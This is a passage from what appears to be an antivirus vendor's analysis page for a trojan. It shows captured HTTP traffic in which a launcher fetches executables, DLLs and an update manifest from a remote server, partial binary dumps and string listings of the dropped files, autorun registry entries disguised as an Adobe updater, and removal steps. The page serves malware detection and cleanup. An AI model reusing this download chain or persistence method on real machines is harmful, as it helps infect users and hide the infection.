Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:34 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 392738
Last-Modified: Sat, 03 Jan 2015 12:48:37 GMT
Connection: keep-alive
Accept-Ranges: bytes
CWS.....x....\M....Yk..w...K.&..;:'I.Y%....*...B9n..].I......a$E..Bf0.
0I..0.3..3...|.........^....n.}..u...Z....V,.....K.J.QA..N%E....^e....
...<"..|...&&&...h........G.62.5k........ia......k....e....cH......
.........o........."..lD.a`...........F.......!....B.c.G.._.nc7.J.9<
;0z..8j....hb>0\..{...M........f........b-..`cjlbj`la`j.cbfeF...fln
el./}.n.w..!1...1...<........d.......4c............Uq.....R........
n....7rcT.....4...Y....M.6.*p.J.U.......FF.....5h.k..f.....7..........
...DF.`....u....::. d...:.'.2.. $z....!...?Jf...KT...`...........2.~..
?;.6...*4":&0be.....m...l..dn.hialf?.............a....)....?u..... 7..
..k..................fa...4........b.?..K..Z[...:.T..........B..:..v..
.........?...gq...\.U...-.....k..,i..L.6.p.......S..I.F...n......F..L.
qZ.F .r..D...K...'..(.......P..'&.-.S.VB,.m...y...../..D....Z....j....
u......T`[email protected] ...`&PO8m....6Z...I?.
.k....oC......[.7.{;..=p...r.>9.a..o.6... [email protected]..<
.........B..po`........xG...X.-`..d.....K..e...dl ...@!..d%p...Lb.....
TW....P`3.n.pg-iG.....#....F.qm......`.F..f`k,..G~'...Tm.8..K. ..v;.y.
........$.>.~&..$.m.H.=..d..T.`.P.......Gt.$y.....}9$......,.X..H=.
..'.....N......"..b2......B9.RIrB0.........uD.....$.FR?Md..I.N..Z..S..
..ng..s.p.....g..n......N.....2....M4......].^...n...Irr......!5u...G.
.O.~Ot.......C..#[email protected]`...3...".."m...7..[ [email protected].#
.>...D..3.....?.....!'.E....B.Ka..B.....R.0.B.x...)..@!X.B..B.2A...
.....h...o.).O..K.8.....N..iP0...q..r-.w.)..J.-....8=...R..pYDA.Oa
<<< skipped >>>

GET /Update/mimetype?1420990604517 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Length: 59
Connection: keep-alive
Last-Modified: Sat, 03 Jan 2015 12:48:37 GMT
ETag: "700004-3b-50bbee037d340"
Accept-Ranges: bytes
application/vnd.adobe.air-application-installer-package zip....


GET /Update/svchost.exe?1420990604642 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Type: application/octet-stream
Content-Length: 59392
Last-Modified: Wed, 22 Feb 2012 21:05:48 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
.... .v.......u.......c...... ................d.......q.....Rich......
......PE..L.....EO.................~...f......%.............@.........
.................0.......A....@.................................|...x.
..................................................................0...
@...............\............................text...H}.......~........
.......... ..`.rdata..b>.......@..................@[email protected].... ...
[email protected]...............................@[email protected]
[email protected].................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..SV.u.W.u.Vj...(.@...
t^;E.tY...E.3.@..~...f.<N\t.Iu...t=B;.|..U.3.f9.t!.y..tN.;}.s"f..B@
f..GFFf.<B.u..u...3.f.LF.....2._^[][email protected].@..
e...M...}...=D.@....,.@.|.S.v.....u..E......}..|.S.v.....u..E......E..
[email protected][email protected]..@.
[email protected]#.U..E. ....U..E....U.f...f..AA.M
[email protected]@;M.r.3.f..F3.PPPV..<[email protected]
.u..E.V..<[email protected]..@[email protected][email protected]..@
<<< skipped >>>

GET /Update/Adobe AIR/Versions/1.0/Adobe AIR.dll?1420990604923 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:36 GMT
Content-Type: application/octet-stream
Content-Length: 14317952
Last-Modified: Wed, 22 Feb 2012 21:01:28 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZ......................@...................................(.........
..!..L.!This program cannot be run in DOS mode....$.........?...Q]..Q]
..Q]..Q]..Q]..^]..Q]...]..Q]0..]..Q].u<]..Q].u*]..Q]..P]..Q]N..]..Q
]...]..Q]...]..Q]...]..Q]...]..Q]...]..Q]...]..Q]...]..Q]Rich..Q].....
...................PE..L...&.EO...........!..........S......V.........
...........................................@..........................
.......(s.......`..Dv...........d...........8.........................
.............................X............................text........
....................... ..`.rodata............................. ..`.rd
ata....A.......A.................@[email protected]...............
[email protected][email protected]...`...x.....
.............@[email protected][email protected].............
......................................................................
......................................................................
................................................D$..V....L...t.V.:GN.Y
..^....A..A..V...F.W.8....~..8......u..F...u...j.........Y...._^..A..V
...N..F...u..F...u...j.....^..Y..^.VW. .....Y....t.P..g......3..H.....
Y....t.W.........3..H..@._^.U....0SW.u...L...3..^..~..^..F$...E.j...d.
[email protected].....<.....,.....0.....4.....8.........V...
....j.Y3...d.....D.....H.....L......P.....T......X.....\.....`.....j..
[email protected].....(....U...$....U.3..U..].j..E.PW...`.
..G......|...3..U..U..U..].j..E.PW.......G......|.3..]..]..]..].W.
<<< skipped >>>


GET /update.xml?1420990600032 HTTP/1.1
Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:32 GMT
Content-Type: text/xml
Content-Length: 3993
Last-Modified: Sat, 03 Jan 2015 14:00:06 GMT
Connection: keep-alive
Accept-Ranges: bytes
<xml>..<file>...<fileName>svchostUpdate.exe</file
Name>...<fileDir>../</fileDir>...<fileDirWebServer&g
t;hXXp://VVV.shmonka.ru/Update/launcher/svchostUpdate.exe</fileDirW
ebServer>...<filesize>59392</filesize>..</file>..
<file>...<fileName>main.swf</fileName>...<fileDir
></fileDir>...<fileDirWebServer>hXXp://VVV.shmonka.ru/U
pdate/main.swf</fileDirWebServer>...<filesize>392738</f
ilesize>..</file>..<file>...<fileName>mimetype<
;/fileName>...<fileDir></fileDir>...<fileDirWebServe
r>hXXp://VVV.shmonka.ru/Update/mimetype</fileDirWebServer>...
<filesize>59</filesize>..</file>..<file>...<
;fileName>svchost.exe</fileName>...<fileDir></fileDi
r>...<fileDirWebServer>hXXp://VVV.shmonka.ru/Update/svchost.e
xe</fileDirWebServer>...<filesize>59392</filesize>..
</file>..<file>...<fileName>Adobe AIR.dll</fileNa
me>...<fileDir>Adobe AIR/Versions/1.0/</fileDir>...<
fileDirWebServer>hXXp://VVV.shmonka.ru/Update/Adobe AIR/Versions/1.
0/Adobe AIR.dll</fileDirWebServer>...<filesize>14317952<
;/filesize>..</file>..<file>...<fileName>Adobe AI
R.vch</fileName>...<fileDir>Adobe AIR/Versions/1.0/Resourc
es/</fileDir>...<fileDirWebServer>hXXp://VVV.shmonka.ru/Up
date/Adobe AIR/Versions/1.0/Resources/Adobe AIR.vch</fileDirWeb
<<< skipped >>>

GET /Update/launcher/launcher.swf?1420990601267 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:32 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 3200
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
CWS.9...x..X.s....].\..%..e9.)[.c].)..c..AZR,....9(."."b.`.PG.FQ.4m.#.
k.4.?...3.4.C_....J.<t:.>..p..I...IR...~......u.}.Pg.B].M.......
..d....T*.^*.V.v.O.l...F........s%.......h<>.....n ...u..X..0...
..m..#|.,......u.....Z..R..2......R....(..L.I.).a..Fql.sERE.*Dn...,.. 
......`d........K.G%..bSp......|~0>...'b#.a._.I..>..gMt..J^.....
A96(./..$F.%F.......x..F^S7....g.R..$.........Yt...EY...n[.o..7.K..YR.
1.\.j9. ...Z.#woMYe.*..Rt........==..R..m..L}:...Qf.yf..3...d.`...3.e 
z..L..aH....y.Blb"5rat89......d|r...H2.7.....mSF..q.k...m.D......A.>
;A..D.T\H.^.:...b.'....dldd491*..Z..b.Wfj.,.2.....bZ.#u.D.*...oB{..d|d
b..yyx...{L..-.C.zL.....`.V.............X.M....~.....#.......-.S......
S...6.U7#1....K.../.........~...F.b....$. a...A.c &.1...3*.s..V.F.3...
.X...Z..#...@]U..:........i....3.....3w].R~~[.a....Ji...4.D.q.t...r..e
.l.UL.<.........T.\..M6....~V.o.P...P.T.E#>..I......j.e...=_..M.
%...|...?.z>0i.: .".t...:k.@..}.'.P2.{..Y.....P.9E...$.5.\T6.9cUc.E
.....N.........lw. ......Y.P...L...!..&..{ Wsn...5.&]..I<...K.7Me.S
4V.j..)....Oz.... .....a..V.........Vb.W..L....\L..|.....e3..3.v.u....
...|z>PS].........S/ [email protected]....;.0.....(.......u....J....
X.m*9.l.....[d..].5.....\Dx......O_.O.,.\.c.kiJ3._...n'h...7....XFq..T
.._...2T..... F.4...>...-.o..,&....V.....L.0b.-m,....Bkb....Y\d.2..
.....y.....Vs....^..y..K{.....T..L.t..v(.[..5.'5......:...e..r. .w....
.E..q|J..Zm.3...F..F-n..A_,....gt...8.h.B.\6L.......Cl....Ule..D...jx.
......Cu .|.|Y}...p}.|../.|U....p.n.]...njd....'..[`.nH...V..$.R..
<<< skipped >>>

GET /Update/launcher/META-INF/signatures.xml?1420990601454 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Type: text/xml
Content-Length: 6026
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
<signatures>..  <Signature xmlns="hXXp://VVV.w3.org/2000/09/x
mldsig#" Id="PackageSignature">..    <SignedInfo>..      <
CanonicalizationMethod Algorithm="hXXp://VVV.w3.org/TR/2001/REC-xml-c1
4n-20010315"/>..      <SignatureMethod Algorithm="hXXp://VVV.w3.
org/TR/xmldsig-core#rsa-sha1"/>..      <Reference URI="#PackageC
ontents">..        <Transforms>..          <Transform Algo
rithm="hXXp://VVV.w3.org/TR/2001/REC-xml-c14n-20010315"/>..        
</Transforms>..        <DigestMethod Algorithm="hXXp://VVV.w3
.org/2001/04/xmlenc#sha256"/>..        <DigestValue>VTOyj vs7
OBPMsG68HpfpIOTZ0D7VHOnAKee5YTYXdc=</DigestValue>..      </Re
ference>..    </SignedInfo>..    <SignatureValue Id="Packa
geSignatureValue">TLejgvPrtic V Ld6YHzz6I38cgFHPgdUHItyEmDfn98RL/W5
6ajfV8UaU5dBZxvI6bl78EAVLRN.hQtE5wCqgss0WuQGwHuAymnWvDMBzGY3Sk4ixtDuSq
hBgyr5sCVHQ5fJzgCfhBQD7uKL6tVnEUT0.8KezkaowOusM5nXnzA0=</SignatureV
alue>..    <KeyInfo>..      <X509Data>..        <X50
9Certificate>MIICFTCCAX2gAwIBAgIaNDY3ZTFmMTI6MTQ1MTIxNDAwNjQ6LTgwMD
AwDQYJKoZIhvcNAQEFBQAw.NzELMAkGA1UEBhMCVVMxDDAKBgNVBAoTA2xvbDEMMAoGA1U
ECxMDbG9sMQwwCgYDVQQDEwNsb2ww.HhcNMTQwMzI5MDkyMTExWhcNMTkwMzMwMDkyMTEx
WjA3MQswCQYDVQQGEwJVUzEMMAoGA1UEChMD.bG9sMQwwCgYDVQQLEwNsb2wxDDAKBgNVB
AMTA2xvbDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC.gYEAjk4dU8Duq3j ntLT8PKKW 
pdL586NVNdHMRthmgAi/2mk2B8GuR6vas9fN8kxR53M3XkCtOt.WF89x8WvKZ5CswNSARu
BtsM5l7YQCTZWjNp8Qvq1hbC6lvaBMAAJRcN8YgF0EqZH9Jm6Q2TDfUkm.wCnWTYnc
<<< skipped >>>

GET /Update/launcher/META-INF/AIR/application.xml?1420990601610 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Type: text/xml
Content-Length: 1400
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
Connection: keep-alive
Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>..<!--
...Usage:...To localize the description, use the following format for 
the description element....<description>...<text xml:lang="en
">English App description goes here</text>...<text xml:lan
g="fr">French App description goes here</text>...<text xml
:lang="ja">Japanese App description goes here</text>...</d
escription>...To localize the name, use the following format for th
e name element....<name>...<text xml:lang="en">English App
 name goes here</text>...<text xml:lang="fr">French App na
me goes here</text>...<text xml:lang="ja">Japanese App nam
e goes here</text>...</name>..--><application xmlns=
"hXXp://ns.adobe.com/air/application/3.2">..  <id>launcher<
;/id>..  <versionNumber>1.4</versionNumber>..  <file
name>launcher</filename>..  <description/>..  <name&
gt;launcher</name>..  <copyright/>..  <initialWindow>
;..    <content>launcher.swf</content>..    <systemChro
me>standard</systemChrome>..    <transparent>false</
transparent>..    <visible>false</visible>..    <ful
lScreen>false</fullScreen>..    <aspectRatio>portrait&l
t;/aspectRatio>..    <renderMode>auto</renderMode>..   
 <maximizable>false</maximizable>..    <minimizable>
false</minimizable>..    <resizable>false</resizabl
<<< skipped >>>

GET /Update/launcher/META-INF/AIR/hash?1420990601735 HTTP/1.1


Referer: app:/launcher.swf
Accept: text/xml, application/xml, application/xhtml xml, text/html;q=0.9, text/plain;q=0.8, text/css, image/png, image/jpeg, image/gif;q=0.8, application/x-shockwave-flash, video/mp4;q=0.9, flv-application/octet-stream;q=0.8, video/x-flv;q=0.7, audio/mp4, application/futuresplash, */*;q=0.5
x-flash-version: 11,2,202,222
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/3.2
Host: VVV.shmonka.ru
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 Jan 2015 15:36:33 GMT
Content-Length: 32
Connection: keep-alive
Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT
ETag: "940422-20-50bc0835ba140"
Accept-Ranges: bytes
.2..O^......jG.].6..'M.t.;mP95.7HTTP/1.1 200 OK..Server: nginx..Date: 
Sun, 11 Jan 2015 15:36:33 GMT..Content-Length: 32..Connection: keep-al
ive..Last-Modified: Sat, 03 Jan 2015 14:45:49 GMT..ETag: "940422-20-50
bc0835ba140"..Accept-Ranges: bytes...2..O^......jG.].6..'M.t.;mP95.7..

The Trojan connects to the servers at the folowing location(s):

WPFFontCache_v0400.exe_1988:

.text
`.data
@.rsrc
@.reloc
t1Ht.Ht
Ht.Ht
8Y%u(
Ht.Ht$Ht
tGHt;Ht.Ht$Ht
!!"$%%&$%%&())*
%s %s line %d
SHELL32.dll
RPCRT4.dll
MSVCR100_CLR0400.dll
KERNEL32.dll
ADVAPI32.dll
RegNotifyChangeKeyValue
RegCloseKey
RegQueryInfoKeyW
RegOpenKeyExW
GetSystemWindowsDirectoryW
_crt_debugger_hook
_amsg_exit
wpffontcache_v0400.pdb
.?AVMalformedKeyException@@
.?AVNotSupportedException@@
6666666666666666
666666666666
6666666
8888888
!"#$%&'()* ,-./
0000000000000
#@$@$@$@$
@:@$@$@$@$@$@$@$@$@$@$
!"#$%&'()* ,-./0
%&'(gggg)* ,..........................................................................................MMMM..
4444444444444
#$%&'()* 
!!!!"#$%&'()* ,-./0123456789:;<=
KEYW
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="wpffontcache_v0400" type="win32"></assemblyIdentity><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4 4}455<5
:":&:*:.:2:
0!0&0,03090?0
1 1$1(1,1014181
>0>8>`>~>
1$1@1\1|1
Software\Microsoft\Avalon.Graphics
kernel32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
MARLETT.TTF
E\\?\
\WPFFontCache_v0400-System.dat
{2da8dded-086f-4cb9-a77f-b974b9cb0186}
\\?\UNC\
{00000000-0000-0000-0000-000000000000}
\\?\Volume
yKERNEL32.DLL
KeySize
ElementMalformedKeyTask
CacheMissReportReceivedTask
wpffontcache_v0400.exe
4.0.30319.1 built by: RTMRel
.NET Framework
4.0.30319.1

launcher.exe_844:

.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
g:\Acro_root_apb\Main\code\build\win\results\Release\info\CaptiveAppEntry.pdb
GetProcessHeap
KERNEL32.dll
SHELL32.dll
USER32.dll
SHLWAPI.dll
GetCPInfo
msi.dll
GetConsoleOutputCP
%WinDir%\System32\launcher.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
3 3$3@3\3`3
hXXp://VVV.adobe.com/go/getair_tr adresinden
hXXp://VVV.adobe.com/go/getair_se
hXXp://VVV.adobe.com/go/getair_pl
Deze toepassing vereist een versie van Adobe AIR die niet is gevonden.
hXXp://VVV.adobe.com/go/getair_nl
of neem contact op met de schrijver van de toepassing voor een bijgewerkte versie.
hXXp://VVV.adobe.com/go/getair_cz
hXXp://VVV.adobe.com/go/getair
hXXp://VVV.adobe.com/go/getair_cn
hXXp://VVV.adobe.com/go/getair_ru
o mais recente do tempo de execu
hXXp://VVV.adobe.com/go/getair_br
hXXp://VVV.adobe.com/go/getair_kr
hXXp://VVV.adobe.com/go/getair_jp
hXXp://VVV.adobe.com/go/getair_it
hXXp://VVV.adobe.com/go/getair_fr
hXXp://VVV.adobe.com/go/getair_es,
hXXp://VVV.adobe.com/go/getair,
hXXp://VVV.adobe.com/go/getair_de
from hXXp://VVV.adobe.com/go/getair.
\Versions\1.0\Adobe AIR.dll
runtimes\air\win\Adobe AIR\Versions\1.0\Adobe AIR.dll
runtimeSDK\Adobe AIR\Versions\1.0\Adobe AIR.dll
\Adobe AIR\Versions\1.0\Adobe AIR.dll
kernel32.dll
mscoree.dll
KERNEL32.DLL
{DC74C3C6-CAB8-4C49-BE18-5B1DCD0D197E}


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1872
    instal.exe:1992
    launcher.exe:1532
    WPFFontCache_v0400.exe:1988

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (2917 bytes)
    %Documents and Settings%\%current user%\Application Data\svchost.exe (12 bytes)
    %Documents and Settings%\%current user%\Application Data\pandahack.exe (18251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
    %System%\Adobe AIR\Versions\1.0\Adobe AIR.dll (324576 bytes)
    %System%\META-INF\AIR\application.xml (1 bytes)
    %System%\svchostUpdate.exe (1067 bytes)
    %Program Files%\Company\Test\Uninstall.exe (3195 bytes)
    %System%\META-INF\AIR\hash (32 bytes)
    %System%\launcher.swf (3 bytes)
    %System%\META-INF\signatures.xml (818 bytes)
    %System%\launcher.exe (329 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\adobecp.dll (90336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (34242 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll (162417 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\CaptiveAppEntry.exe (1568 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\AdobeCP15.dll (60436 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (20637 bytes)
    %System%\mimetype (59 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\adobecp.vch (11242 bytes)
    %Program Files%\Company\Test\Uninstall.ini (3 bytes)
    %System%\Adobe AIR\Versions\1.0\Resources\WebKit.dll (77249 bytes)
    %System%\svchost\Adobe AIR\Versions\1.0\Adobe AIR.dll (107182 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Adobe AIR[1] (2917624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\main[1].swf (60712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\mimetype[1] (59 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].xml (818 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Adobe AIR[1].vch (217004 bytes)
    %System%\svchost\mimetype (59 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\svchost[1] (5716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\AdobeCP[1] (1051142 bytes)
    %System%\svchost\svchost.exe (59 bytes)
    %System%\svchost\main.swf (1673 bytes)
    %System%\svchost\Adobe AIR\Versions\1.0\Resources\Adobe AIR.vch (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\signatures[1].xml (825 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\application[1].xml (1400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].xml (818 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\hash[1] (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\launcher[1].swf (796 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Flash Updater" = "%Documents and Settings%\%current user%\Application Data\svchost.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "test" = "%WinDir%\System32\launcher.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now